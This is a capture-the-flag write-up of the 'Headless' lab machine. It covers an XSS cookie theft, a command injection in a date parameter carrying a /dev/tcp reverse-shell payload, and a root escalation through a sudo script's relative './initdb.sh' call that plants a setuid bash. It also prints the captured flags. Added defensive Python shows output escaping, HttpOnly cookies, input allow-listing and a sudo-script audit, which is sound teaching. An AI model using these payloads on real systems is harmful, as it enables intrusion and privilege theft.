Headless

Recon

nmap_scan.log

HTTP (5000)

It's a Python server, and there is a submit form on /support.

└─$ feroxbuster -u http://10.10.11.8:5000/ -w /usr/share/seclists/Discovery/Web-Content/common.txt
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.11.8:5000/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦑  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        5l       31w      207c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       93l      179w     2363c http://10.10.11.8:5000/support
200      GET       96l      259w     2799c http://10.10.11.8:5000/
500      GET        5l       37w      265c http://10.10.11.8:5000/dashboard
[####################] - 47s     4729/4729    0s      found:3       errors:0
[####################] - 47s     4728/4728    101/s   http://10.10.11.8:5000/

The form says our submission is reported to the admins, who will review it. An SSTI attempt didn't work, but it did trigger the hacking-attempt alert.

Writeup.png

After testing for XSS, we find we can inject, and since an admin will look at our report, we can steal their cookie:

Writeup-1.png
└─$ serve
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.14.37 - - [27/Jul/2024 12:52:46] "GET /? HTTP/1.1" 200 -
10.10.11.8 - - [27/Jul/2024 12:53:58] "GET /?is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0 HTTP/1.1" 200 -
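Why the admin's cookie ended up in our web server log, seen from the application side. This is an added example and not the box's own code: a review page that concatenates the submitted report into HTML, beside a version that escapes it, and the admin cookie built with and without `HttpOnly`. The field names, the `render_report_*` functions and the sample report are assumptions.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample: a support report whose message field carries markup.
SAMPLE_REPORT = {
    "fname": "Ivan",
    "message": '<img src=x onerror="alert(document.cookie)">',
}


def render_report_unsafe(report: dict) -> str:
    """Vulnerable pattern: user-controlled fields are concatenated into HTML.
    When the admin's browser opens this page, the markup is parsed and executed."""
    return (
        "<h2>Hacking attempt detected</h2>"
        f"<p>From: {report['fname']}</p>"
        f"<pre>{report['message']}</pre>"
    )


def render_report_safe(report: dict) -> str:
    """Hardened: every user-controlled value is HTML-escaped before insertion,
    so the browser shows it as text instead of parsing it as markup."""
    return (
        "<h2>Hacking attempt detected</h2>"
        f"<p>From: {html.escape(report['fname'])}</p>"
        f"<pre>{html.escape(report['message'])}</pre>"
    )


def contains_tag(rendered: str) -> bool:
    """Crude check used only to show the difference between the two renderers:
    does the output still contain an unescaped tag opener?"""
    lowered = rendered.lower()
    return "<img" in lowered or "<script" in lowered


def build_session_cookie(value: str, hardened: bool) -> str:
    """Return the Set-Cookie header value for the admin session cookie.
    Without HttpOnly the value is readable from document.cookie, which is what
    the is_admin cookie in the log above relied on. The value is a placeholder."""
    cookie = SimpleCookie()
    cookie["is_admin"] = value
    if hardened:
        cookie["is_admin"]["httponly"] = True   # not readable from JavaScript
        cookie["is_admin"]["secure"] = True     # only sent over HTTPS
        cookie["is_admin"]["samesite"] = "Strict"
        cookie["is_admin"]["path"] = "/"
    return cookie["is_admin"].OutputString()


if __name__ == "__main__":
    print(render_report_unsafe(SAMPLE_REPORT))
    print(render_report_safe(SAMPLE_REPORT))
    print(build_session_cookie("SIGNED-VALUE-PLACEHOLDER", hardened=False))
    print(build_session_cookie("SIGNED-VALUE-PLACEHOLDER", hardened=True))
```

Escaping stops the report from being interpreted as markup; `HttpOnly` limits the damage if an escape is ever missed, because the cookie is then not exposed to script at all.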

Let's set the cookie in our browser so we can access /dashboard:

Writeup-2.png

We have a command injection:

Writeup-3.png

Get a reverse connection by injecting into the date parameter:

date=2023-09-15;bash+-c+'exec+bash+-i+%26>/dev/tcp/10.10.16.74/4444+<%261'%3b
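How the dashboard's `date` parameter becomes a command injection, and what the fix looks like. This is an added example, not the box's code: the vulnerable pattern interpolates the parameter into a shell command line, while the hardened handler allow-lists the value as a real `YYYY-MM-DD` date and passes it as one argv element with `shell=False`. The `report.sh` script name, the handler functions and the sample inputs are assumptions.

```python
import re
import subprocess
from datetime import date
from typing import List

# Constructed sample inputs: a legitimate value and one carrying a shell separator.
GOOD_DATE = "2023-09-15"
INJECTED = "2023-09-15;id"

DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def build_command_unsafe(user_date: str) -> str:
    """Vulnerable pattern: the parameter is interpolated into a command line that
    is later handed to a shell, so ';' ends the intended command and starts another."""
    return f"bash report.sh {user_date}"


def validate_date(user_date: str) -> bool:
    """Allow-list check: exactly YYYY-MM-DD and a real calendar date."""
    if not DATE_RE.match(user_date):
        return False
    try:
        date.fromisoformat(user_date)
    except ValueError:
        return False
    return True


def build_command_safe(user_date: str) -> List[str]:
    """Hardened: reject anything that is not a date, then build an argv list.
    Run with shell=False, the value is a single argument and no shell ever parses it."""
    if not validate_date(user_date):
        raise ValueError(f"rejected date parameter: {user_date!r}")
    return ["bash", "report.sh", user_date]


def accepts(user_date: str) -> bool:
    """True if the hardened handler would run the report for this value."""
    try:
        build_command_safe(user_date)
    except ValueError:
        return False
    return True


def run_report(user_date: str) -> subprocess.CompletedProcess:
    """Execute the (hypothetical) report script without a shell."""
    return subprocess.run(build_command_safe(user_date), shell=False,
                          capture_output=True, text=True, check=False)


def has_shell_metacharacters(value: str) -> bool:
    """Detection helper for request logs: flag parameter values a shell would interpret."""
    return bool(re.search(r"[;&|`$<>(){}\n]", value))


if __name__ == "__main__":
    print("unsafe command line:", build_command_unsafe(INJECTED))
    print("safe argv:          ", build_command_safe(GOOD_DATE))
    print("injected accepted?  ", accepts(INJECTED))
```

`has_shell_metacharacters` is the kind of check a WAF or log review would apply to the `date` parameter; it is a detection aid, not a substitute for the allow-list, since encoding tricks can evade a deny-list while a strict format check cannot be bypassed.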

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Headless]
└─$ pwncat -lp 4444
[11:10:50] Welcome to pwncat 🐈!                                                          __main__.py:164
[11:11:35] received connection from 10.10.11.8:44466                                           bind.py:84
[11:11:45] 10.10.11.8:44466: registered new host w/ db                                     manager.py:957
(local) pwncat$
(remote) dvir@headless:/home/dvir/app$ whoami
dvir

User.txt

(remote) dvir@headless:/home/dvir$ cat user.txt
f26c90df3ce8f2512cd9262a909f18f7
-bash-5.2$ sudo -l
Matching Defaults entries for dvir on headless:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck
    
-bash-5.2$ cat /usr/bin/syscheck
#!/bin/bash

if [ "$EUID" -ne 0 ]; then
  exit 1
fi

last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"

disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"

load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."
fi

exit 0
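The weakness in `syscheck` is the relative `./initdb.sh`: sudo runs the script as root but keeps the caller's working directory, so whatever `initdb.sh` sits in that directory is what gets executed. As an added audit helper (Python, not part of the box), the function below scans a script that sudoers allows and flags every command word that is not an absolute path. The sample input is an inline copy of the `syscheck` script shown above; the helper name and its parsing rules are assumptions and cover only the simple shell constructs that script uses.

```python
import re
from typing import List, Tuple

# Constructed inline copy of the syscheck script shown above, used as sample input.
SYSCHECK = """\
#!/bin/bash

if [ "$EUID" -ne 0 ]; then
  exit 1
fi

last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"

disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"

load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."
fi

exit 0
"""

# Points where a new command word begins: lists, pipelines, command substitution,
# negation, and the shell keywords that precede a command.
SPLIT_RE = re.compile(
    r"\|\||&&|\|&|;|\||\$\(|!|"
    r"(?<![\w./-])(?:if|then|else|elif|do|while|until)(?![\w./-])"
)
ASSIGN_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
# Builtins and keywords that never resolve through PATH or the working directory.
NOT_COMMANDS = {"[", "[[", "test", "exit", "return", "fi", "done", "then",
                "else", "do", "break", "continue", "set", "shift"}


def audit_script(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, command_word, reason) for every command that is not
    invoked by absolute path. Under sudo the working directory is the caller's,
    so a relative path such as ./initdb.sh runs whatever file the caller placed there."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for segment in SPLIT_RE.split(line):
            tokens = segment.split()
            while tokens and ASSIGN_RE.match(tokens[0]):
                tokens.pop(0)  # skip leading VAR=value prefixes
            if not tokens:
                continue
            cmd = tokens[0].rstrip(")")
            if not cmd or cmd.startswith("/") or cmd in NOT_COMMANDS:
                continue
            if "/" in cmd:
                reason = "relative path: resolved against the caller's working directory"
            else:
                reason = "bare name: resolved through PATH (secure_path under sudo)"
            findings.append((line_no, cmd, reason))
    return findings


if __name__ == "__main__":
    for line_no, cmd, reason in audit_script(SYSCHECK):
        print(f"line {line_no}: {cmd} -> {reason}")
```

The fix on the script side is to invoke `initdb.sh` by absolute path from a root-owned, non-writable directory; the audit above is the check that would have caught the relative invocation before the rule was added to sudoers.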
-bash-5.2$ nano initdb.sh
-bash-5.2$ cat initdb.sh
#!/bin/bash

cp /bin/bash /tmp/rootbash
chmod 4777 /tmp/rootbash

-bash-5.2$ sudo /usr/bin/syscheck

Root.txt

-bash-5.2$ /tmp/rootbash -p
rootbash-5.2# cat root.txt
fa5b0bca103ea07fc198529ca9604b06
